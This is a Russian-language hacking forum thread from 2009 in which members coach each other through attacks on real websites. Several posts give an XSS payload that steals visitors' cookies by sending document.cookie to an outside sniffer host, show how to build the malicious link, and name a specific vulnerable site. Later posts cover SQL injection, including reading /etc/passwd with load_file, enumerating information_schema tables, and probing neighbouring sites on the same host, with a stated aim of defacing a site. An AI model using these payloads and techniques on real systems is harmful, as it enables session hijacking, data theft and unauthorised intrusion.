 |
|
06.04.2009, 17:10
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Saiga, если пасивка, то кидаешь с линком что то типа:
<script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>
да в принципе если и активка, то этот вариант подойдёт 
цитата ниженаписанного:
как я понял из его вопроса он не может сформировать правильный линк...
...а вот kak подставить к ссылке никак не понимаю. сайт не хочу пока что давать.
без линка сложно будет помочь...
Иногда линк формируется примерно так:
http://site.com/blablabla.php"><script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>
Ну это лишь один из случаев...
Последний раз редактировалось -m0rgan-; 06.04.2009 в 17:40..
|
|
|
06.04.2009, 17:26
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами:
9116636
Репутация:
39
|
|
Сообщение от joks
я до этого тоже додумался, и спрашивал, потому что нету желания платить за 3-х значный домен, который мне больше не будет нужен. И сайт сам по себе того не стоит, мне чистый дефейс нужно сделать, пробил все сайты на хосте, ни одной потенциальной баги, все статичные htm мелких предприятий...
з.ы.
но тут появилась идея попробовать взломать какой-нибудь 2-х или 3-х значный домен =)
3 буквы ру стоят 1 бакс
http://www.drupal.ru/node/26048
|
|
|
|
06.04.2009, 17:28
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
Сообщение от -m0rgan-
Saiga, если пасивка, то кидаешь с линком что то типа:
<script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>
да в принципе если и активка, то этот вариант подойдёт как я понял из его вопроса он не может сформировать правильный линк... так что не надо меня пугать jokester"om  ми нисколько не боится.
PS jokester, ты всех тут запугал 
Последний раз редактировалось xcedz; 06.04.2009 в 17:31..
|
|
|
|
06.04.2009, 18:13
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
http://www.toidutare.ee//retsept.php?otsi=1
<scr_ipt>im*g=new Image();im*g.src="http://sniffer.xaknet.ru/userbars/img_4_551.gi*f?"+document.cookie;</scri_pt>
что то такое ? но на сниффере , самого меня показывает ))
это пассивка , спс за помощь
Последний раз редактировалось Saiga; 06.04.2009 в 18:22..
|
|
|
|
06.04.2009, 18:15
|
|
Познающий
Регистрация: 05.04.2009
Сообщений: 71
С нами:
9000055
Репутация:
5
|
|
Привет всем ребята помогите
Нашел сайтик что мне нужно! сделал sql-inj
Узнал
Версия версия СУБД (базы данных) - 5.0.45
пролистал все колонки но нигде не нашел упоминание о admin user
Что сделал не так кто поможет?
,load_file(0x2f6574632f706173737764)
load_file(/etc/passwd/)
И просмотрел все 115 полей посмотрел каждое поле думал что админ поменял название ничего нет! Что делать уже не знаю
|
|
|
|
06.04.2009, 18:22
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Значит не судьба, если нужен так именно этот сайт, попробуй поискать баги у "соседей".
|
|
|
|
06.04.2009, 18:23
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Сообщение от Saiga
http://www.toidutare.ee//retsept.php?otsi=1
Сиега, пихаешь в уязвимое поле свой яваскрипт, например "><script>alert()</script> и смотри в адресную строку:
Код:
http://www.toidutare.ee//retsept.php?otsi=1&string=&string2=&string3=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&liik=
Этот линк и кидать, с другими даннымы разумеется...
|
|
|
|
06.04.2009, 18:25
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от massovka
Привет всем ребята помогите
Нашел сайтик что мне нужно! сделал sql-inj
Узнал
Версия версия СУБД (базы данных) - 5.0.45
пролистал все колонки но нигде не нашел упоминание о admin user
Что сделал не так кто поможет?
,load_file(0x2f6574632f706173737764)
load_file(/etc/passwd/)
И просмотрел все 115 полей посмотрел каждое поле думал что админ поменял название ничего нет! Что делать уже не знаю
Прежде чем смотреть поля, надо узнать в каких таблицах ты эти поля смотришь:
union+select+table_name+from+information_schema.ta bles
|
|
|
|
06.04.2009, 18:31
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Сообщение от Pashkela
Прежде чем смотреть поля, надо узнать в каких таблицах ты эти поля смотришь:
union+select+table_name+from+information_schema.ta bles
Скорее всего он таблицы называет полями.
|
|
|
|
06.04.2009, 18:38
|
|
Познающий
Регистрация: 05.04.2009
Сообщений: 71
С нами:
9000055
Репутация:
5
|
|
information_schema.tables вот тут смотрю все 115 полей посмотрел ничего нет ставил стандартные название ничего пусто
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
